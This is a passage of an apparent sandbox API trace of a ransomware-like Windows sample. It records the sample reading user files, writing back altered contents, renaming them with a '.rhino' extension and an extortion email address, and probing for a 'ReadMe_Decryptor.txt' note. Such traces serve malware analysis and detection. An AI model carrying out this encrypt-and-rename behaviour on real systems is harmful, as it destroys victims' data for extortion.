lpOverlapped=0x0) returned 1 [0086.111] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.111] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x9347, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x9347, lpOverlapped=0x0) returned 1 [0086.113] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.113] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.113] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.113] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.113] GetLastError () returned 0x0 [0086.113] SetLastError (dwErrCode=0x0) [0086.113] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.113] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x936a) returned 0x75ef78 [0086.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x7682f0 [0086.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x7683f8 [0086.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7682f0 | out: hHeap=0x6d0000) returned 1 [0086.114] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0086.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0086.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0086.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0086.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x7682f0 [0086.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x768580 [0086.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7682f0 | out: hHeap=0x6d0000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7686c8 [0086.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768580 | out: hHeap=0x6d0000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x7688b0 [0086.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7686c8 | out: hHeap=0x6d0000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x768b80 [0086.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7688b0 | out: hHeap=0x6d0000) returned 1 [0086.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x768fb8 [0086.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768b80 | out: hHeap=0x6d0000) returned 1 [0086.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x768580 [0086.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768fb8 | out: hHeap=0x6d0000) returned 1 [0086.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x768ee8 [0086.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768580 | out: hHeap=0x6d0000) returned 1 [0086.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x769d00 [0086.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768ee8 | out: hHeap=0x6d0000) returned 1 [0086.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x72bfe8 [0086.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x769d00 | out: hHeap=0x6d0000) returned 1 [0086.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x768580 [0086.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0086.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x72bfe8 [0086.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768580 | out: hHeap=0x6d0000) returned 1 [0086.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x730738 [0086.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0086.237] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x73c0b8 [0086.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x730738 | out: hHeap=0x6d0000) returned 1 [0086.239] WriteFile (in: hFile=0xec, lpBuffer=0x73c0c0*, nNumberOfBytesToWrite=0x9467, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x73c0c0*, lpNumberOfBytesWritten=0x2cfa04*=0x9467, lpOverlapped=0x0) returned 1 [0086.239] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0086.239] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x9467, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.240] CloseHandle (hObject=0xec) returned 1 [0086.241] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x7682f0 [0086.241] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17e) returned 0x768580 [0086.241] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7682f0 | out: hHeap=0x6d0000) returned 1 [0086.241] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.242] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768580 | out: hHeap=0x6d0000) returned 1 [0086.242] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7683f8 | out: hHeap=0x6d0000) returned 1 [0086.242] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.242] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0086.242] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0086.242] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0086.242] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x75ef78 [0086.242] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0086.243] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.243] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.243] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AeF73GQFrRUFEfP_C.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aef73gqfrrufefp_c.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.243] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x12154 [0086.243] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x12274, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.243] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.243] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.245] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.245] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x12154, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x12154, lpOverlapped=0x0) returned 1 [0086.246] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.246] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.247] GetLastError () returned 0x0 [0086.247] SetLastError (dwErrCode=0x0) [0086.247] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.247] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12177) returned 0x70a650 [0086.249] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.249] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75ef78 [0086.249] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f080 [0086.249] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.250] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0086.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0086.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.250] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.250] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.251] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0086.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.251] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0086.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.251] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75ef78 [0086.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.251] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75f208 [0086.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.251] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75f350 [0086.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0086.251] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x75f538 [0086.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f350 | out: hHeap=0x6d0000) returned 1 [0086.251] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75f808 [0086.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f538 | out: hHeap=0x6d0000) returned 1 [0086.251] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75fc40 [0086.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f808 | out: hHeap=0x6d0000) returned 1 [0086.251] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75f208 [0086.251] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fc40 | out: hHeap=0x6d0000) returned 1 [0086.253] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75fb70 [0086.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0086.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x760988 [0086.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fb70 | out: hHeap=0x6d0000) returned 1 [0086.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x761ec8 [0086.254] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760988 | out: hHeap=0x6d0000) returned 1 [0086.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x763e90 [0086.255] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761ec8 | out: hHeap=0x6d0000) returned 1 [0086.255] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x75f208 [0086.255] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763e90 | out: hHeap=0x6d0000) returned 1 [0086.255] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x763958 [0086.255] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0086.256] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x71c7d0 [0086.257] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763958 | out: hHeap=0x6d0000) returned 1 [0086.257] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x73c0b8 [0086.258] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c7d0 | out: hHeap=0x6d0000) returned 1 [0086.258] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x781f78 [0086.260] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0086.260] WriteFile (in: hFile=0xec, lpBuffer=0x781f80*, nNumberOfBytesToWrite=0x12274, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x781f80*, lpNumberOfBytesWritten=0x2cfa04*=0x12274, lpOverlapped=0x0) returned 1 [0086.261] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0086.261] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x12274, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.261] CloseHandle (hObject=0xec) returned 1 [0086.263] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0086.263] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x75ef78 [0086.263] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.263] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AeF73GQFrRUFEfP_C.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aef73gqfrrufefp_c.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AeF73GQFrRUFEfP_C.mkv.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aef73gqfrrufefp_c.mkv.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0086.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0086.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0086.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0086.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0086.264] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0086.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.264] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.265] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\C8yKV.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\c8ykv.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.265] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xe63f [0086.265] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xe75f, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.265] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.265] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.267] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.267] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xe63f, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xe63f, lpOverlapped=0x0) returned 1 [0086.268] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.268] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.268] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.268] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.268] GetLastError () returned 0x0 [0086.268] SetLastError (dwErrCode=0x0) [0086.268] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.268] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe662) returned 0x73c0b8 [0086.269] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.269] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x74a728 [0086.269] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x74a830 [0086.269] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74a728 | out: hHeap=0x6d0000) returned 1 [0086.269] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.269] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.269] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.269] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.269] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.269] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.269] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.269] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.269] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, 